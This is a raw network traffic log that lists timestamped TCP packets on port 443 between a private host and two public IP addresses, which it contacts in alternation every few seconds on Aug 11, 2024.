Aug 11, 2024 11:22:07.826303005 CEST	443	49719	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:07.826313972 CEST	443	49719	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:07.826379061 CEST	443	49719	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:07.826383114 CEST	49719	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:07.826425076 CEST	49719	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:07.828213930 CEST	49719	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:08.405889034 CEST	49720	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:08.405934095 CEST	443	49720	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:08.406003952 CEST	49720	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:08.410075903 CEST	49720	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:08.410093069 CEST	443	49720	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:08.877777100 CEST	443	49720	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:08.879725933 CEST	49720	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:08.879750013 CEST	443	49720	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:09.004812002 CEST	443	49720	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:09.004914045 CEST	443	49720	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:09.004949093 CEST	443	49720	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:09.004983902 CEST	443	49720	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:09.005018950 CEST	49720	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:09.005023956 CEST	443	49720	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:09.005049944 CEST	443	49720	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:09.005067110 CEST	49720	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:09.005103111 CEST	49720	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:09.005108118 CEST	443	49720	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:09.005121946 CEST	443	49720	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:09.005176067 CEST	49720	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:09.005182981 CEST	443	49720	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:09.009907007 CEST	443	49720	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:09.009947062 CEST	443	49720	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:09.010011911 CEST	49720	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:09.010023117 CEST	443	49720	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:09.010093927 CEST	49720	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:09.090430975 CEST	443	49720	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:09.090567112 CEST	443	49720	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:09.090720892 CEST	49720	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:09.091068029 CEST	49720	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:13.530276060 CEST	49721	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:13.530340910 CEST	443	49721	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:13.530472040 CEST	49721	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:13.530728102 CEST	49721	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:13.530745029 CEST	443	49721	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:13.991997004 CEST	443	49721	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:13.993707895 CEST	49721	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:13.993731022 CEST	443	49721	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:14.126593113 CEST	443	49721	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:14.126658916 CEST	443	49721	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:14.126697063 CEST	443	49721	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:14.126749992 CEST	443	49721	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:14.126760960 CEST	49721	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:14.126782894 CEST	443	49721	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:14.126823902 CEST	49721	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:14.126847029 CEST	443	49721	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:14.126907110 CEST	49721	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:14.127444983 CEST	49721	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:14.145946980 CEST	49722	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:14.146006107 CEST	443	49722	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:14.146107912 CEST	49722	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:14.146601915 CEST	49722	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:14.146622896 CEST	443	49722	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:14.628810883 CEST	443	49722	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:14.631227016 CEST	49722	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:14.631248951 CEST	443	49722	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:14.773926973 CEST	443	49722	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:14.774027109 CEST	443	49722	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:14.774064064 CEST	443	49722	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:14.774095058 CEST	443	49722	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:14.774147987 CEST	49722	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:14.774168015 CEST	443	49722	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:14.774184942 CEST	49722	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:14.774369001 CEST	443	49722	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:14.774421930 CEST	443	49722	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:14.774430990 CEST	49722	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:14.774441004 CEST	443	49722	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:14.774487019 CEST	49722	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:14.774502993 CEST	443	49722	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:14.779004097 CEST	443	49722	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:14.779031992 CEST	443	49722	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:14.779297113 CEST	49722	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:14.779310942 CEST	443	49722	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:14.779367924 CEST	49722	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:14.862699986 CEST	443	49722	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:14.862833977 CEST	443	49722	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:14.863338947 CEST	49722	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:14.863656044 CEST	49722	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:19.267178059 CEST	49723	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:19.267277002 CEST	443	49723	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:19.267396927 CEST	49723	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:19.267668962 CEST	49723	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:19.267703056 CEST	443	49723	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:19.730487108 CEST	443	49723	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:19.732218027 CEST	49723	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:19.732239962 CEST	443	49723	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:19.879930973 CEST	443	49723	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:19.879966021 CEST	443	49723	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:19.879992008 CEST	443	49723	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:19.880048037 CEST	443	49723	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:19.880134106 CEST	49723	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:19.880182981 CEST	49723	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:19.880830050 CEST	49723	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:19.899488926 CEST	49724	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:19.899514914 CEST	443	49724	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:19.899674892 CEST	49724	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:19.900000095 CEST	49724	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:19.900016069 CEST	443	49724	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:20.358556032 CEST	443	49724	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:20.360508919 CEST	49724	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:20.360522985 CEST	443	49724	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:20.488868952 CEST	443	49724	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:20.488940954 CEST	443	49724	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:20.488965988 CEST	443	49724	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:20.488987923 CEST	443	49724	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:20.489029884 CEST	443	49724	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:20.489052057 CEST	443	49724	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:20.489051104 CEST	49724	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:20.489063978 CEST	443	49724	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:20.489095926 CEST	49724	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:20.489095926 CEST	49724	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:20.496988058 CEST	443	49724	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:20.497013092 CEST	443	49724	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:20.497044086 CEST	443	49724	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:20.497066021 CEST	443	49724	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:20.497093916 CEST	49724	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:20.497108936 CEST	443	49724	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:20.497127056 CEST	49724	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:20.497215986 CEST	49724	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:20.575438023 CEST	443	49724	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:20.575537920 CEST	443	49724	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:20.575697899 CEST	49724	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:20.576172113 CEST	49724	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:25.014444113 CEST	49725	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:25.014491081 CEST	443	49725	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:25.014636040 CEST	49725	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:25.015002012 CEST	49725	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:25.015019894 CEST	443	49725	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:25.488928080 CEST	443	49725	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:25.493338108 CEST	49725	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:25.493433952 CEST	443	49725	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:25.627310991 CEST	443	49725	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:25.627378941 CEST	443	49725	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:25.627435923 CEST	49725	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:25.627441883 CEST	443	49725	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:25.627465010 CEST	443	49725	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:25.627511978 CEST	49725	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:25.627521038 CEST	443	49725	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:25.627552986 CEST	443	49725	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:25.627604008 CEST	49725	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:25.628143072 CEST	49725	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:25.657751083 CEST	49726	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:25.657859087 CEST	443	49726	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:25.658104897 CEST	49726	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:25.658221960 CEST	49726	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:25.658257008 CEST	443	49726	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:26.150938988 CEST	443	49726	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:26.152553082 CEST	49726	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:26.152582884 CEST	443	49726	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:26.290895939 CEST	443	49726	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:26.290992975 CEST	443	49726	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:26.291037083 CEST	443	49726	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:26.291084051 CEST	443	49726	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:26.291081905 CEST	49726	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:26.291153908 CEST	443	49726	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:26.291194916 CEST	49726	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:26.291542053 CEST	443	49726	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:26.291595936 CEST	443	49726	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:26.291608095 CEST	49726	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:26.291623116 CEST	443	49726	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:26.291666031 CEST	443	49726	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:26.291673899 CEST	49726	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:26.291687965 CEST	443	49726	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:26.291759014 CEST	49726	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:26.292419910 CEST	443	49726	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:26.295883894 CEST	443	49726	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:26.295943022 CEST	49726	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:26.295958996 CEST	443	49726	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:26.341314077 CEST	49726	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:26.383009911 CEST	443	49726	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:26.383124113 CEST	443	49726	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:26.383178949 CEST	49726	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:26.383512020 CEST	49726	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:30.819716930 CEST	49727	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:30.819766045 CEST	443	49727	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:30.819849968 CEST	49727	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:30.820141077 CEST	49727	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:30.820157051 CEST	443	49727	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:31.286555052 CEST	443	49727	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:31.288326979 CEST	49727	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:31.288352013 CEST	443	49727	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:31.409022093 CEST	443	49727	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:31.409086943 CEST	443	49727	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:31.409116030 CEST	443	49727	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:31.409146070 CEST	443	49727	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:31.409151077 CEST	49727	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:31.409183025 CEST	443	49727	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:31.409203053 CEST	49727	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:31.409271002 CEST	443	49727	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:31.409322977 CEST	49727	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:31.409874916 CEST	49727	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:31.433249950 CEST	49728	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:31.433281898 CEST	443	49728	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:31.433506012 CEST	49728	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:31.433604002 CEST	49728	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:31.433614016 CEST	443	49728	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:31.894802094 CEST	443	49728	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:31.896845102 CEST	49728	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:31.896852970 CEST	443	49728	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:32.036393881 CEST	443	49728	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:32.036542892 CEST	443	49728	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:32.036571026 CEST	443	49728	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:32.036607027 CEST	443	49728	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:32.036627054 CEST	49728	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:32.036634922 CEST	443	49728	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:32.036663055 CEST	443	49728	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:32.036673069 CEST	49728	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:32.036739111 CEST	49728	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:32.036745071 CEST	443	49728	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:32.037391901 CEST	443	49728	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:32.037431002 CEST	443	49728	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:32.037461996 CEST	49728	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:32.037467957 CEST	443	49728	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:32.037517071 CEST	49728	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:32.041179895 CEST	443	49728	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:32.091444016 CEST	49728	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:32.091449976 CEST	443	49728	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:32.123939037 CEST	443	49728	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:32.124043941 CEST	443	49728	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:32.124242067 CEST	49728	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:32.124242067 CEST	49728	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:32.124438047 CEST	49728	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:36.546031952 CEST	49729	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:36.546101093 CEST	443	49729	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:36.546211958 CEST	49729	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:36.546603918 CEST	49729	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:36.546621084 CEST	443	49729	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:37.015810013 CEST	443	49729	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:37.017545938 CEST	49729	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:37.017570019 CEST	443	49729	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:37.146619081 CEST	443	49729	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:37.146691084 CEST	443	49729	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:37.146734953 CEST	443	49729	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:37.146764040 CEST	49729	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:37.146780014 CEST	443	49729	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:37.146791935 CEST	443	49729	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:37.146833897 CEST	49729	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:37.146847963 CEST	443	49729	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:37.146892071 CEST	49729	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:37.146898985 CEST	443	49729	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:37.146912098 CEST	443	49729	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:37.146962881 CEST	49729	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:37.147594929 CEST	49729	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:37.182511091 CEST	49730	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:37.182573080 CEST	443	49730	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:37.182677984 CEST	49730	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:37.182979107 CEST	49730	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:37.182991982 CEST	443	49730	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:37.655890942 CEST	443	49730	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:37.662883043 CEST	49730	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:37.662936926 CEST	443	49730	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:37.803606987 CEST	443	49730	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:37.803704977 CEST	443	49730	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:37.803761005 CEST	443	49730	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:37.803774118 CEST	49730	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:37.803798914 CEST	443	49730	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:37.803841114 CEST	443	49730	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:37.803878069 CEST	49730	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:37.803896904 CEST	443	49730	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:37.803936005 CEST	443	49730	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:37.803958893 CEST	49730	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:37.803978920 CEST	443	49730	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:37.804037094 CEST	49730	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:37.804049969 CEST	443	49730	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:37.804439068 CEST	443	49730	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:37.804524899 CEST	49730	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:37.804537058 CEST	443	49730	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:37.856959105 CEST	49730	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:37.856983900 CEST	443	49730	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:37.892343998 CEST	443	49730	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:37.892429113 CEST	49730	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:37.892461061 CEST	443	49730	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:37.892476082 CEST	443	49730	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:37.892554045 CEST	49730	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:37.892990112 CEST	49730	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:42.295734882 CEST	49731	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:42.295813084 CEST	443	49731	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:42.296015978 CEST	49731	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:42.296374083 CEST	49731	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:42.296391964 CEST	443	49731	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:42.774877071 CEST	443	49731	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:42.776976109 CEST	49731	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:42.776994944 CEST	443	49731	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:42.895704031 CEST	443	49731	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:42.895767927 CEST	443	49731	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:42.895824909 CEST	443	49731	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:42.895860910 CEST	443	49731	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:42.895898104 CEST	49731	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:42.895917892 CEST	443	49731	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:42.895931005 CEST	49731	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:42.896009922 CEST	443	49731	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:42.896063089 CEST	49731	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:42.896642923 CEST	49731	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:42.913470984 CEST	49732	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:42.913528919 CEST	443	49732	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:42.913677931 CEST	49732	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:42.913954973 CEST	49732	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:42.913966894 CEST	443	49732	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:43.373064995 CEST	443	49732	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:43.374533892 CEST	49732	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:43.374547958 CEST	443	49732	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:43.524610043 CEST	443	49732	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:43.524738073 CEST	443	49732	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:43.524775028 CEST	443	49732	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:43.524811983 CEST	443	49732	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:43.524851084 CEST	443	49732	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:43.524888992 CEST	443	49732	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:43.524946928 CEST	443	49732	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:43.524993896 CEST	49732	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:43.524993896 CEST	49732	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:43.524993896 CEST	49732	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:43.525016069 CEST	443	49732	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:43.525062084 CEST	443	49732	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:43.525073051 CEST	49732	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:43.525080919 CEST	443	49732	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:43.525110006 CEST	49732	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:43.575855970 CEST	49732	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:43.575864077 CEST	443	49732	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:43.610460997 CEST	443	49732	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:43.610558033 CEST	443	49732	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:43.610655069 CEST	49732	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:43.610656023 CEST	49732	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:43.610954046 CEST	49732	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:48.030776978 CEST	49733	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:48.030817032 CEST	443	49733	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:48.030879021 CEST	49733	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:48.031115055 CEST	49733	443	192.168.2.7	172.67.19.24
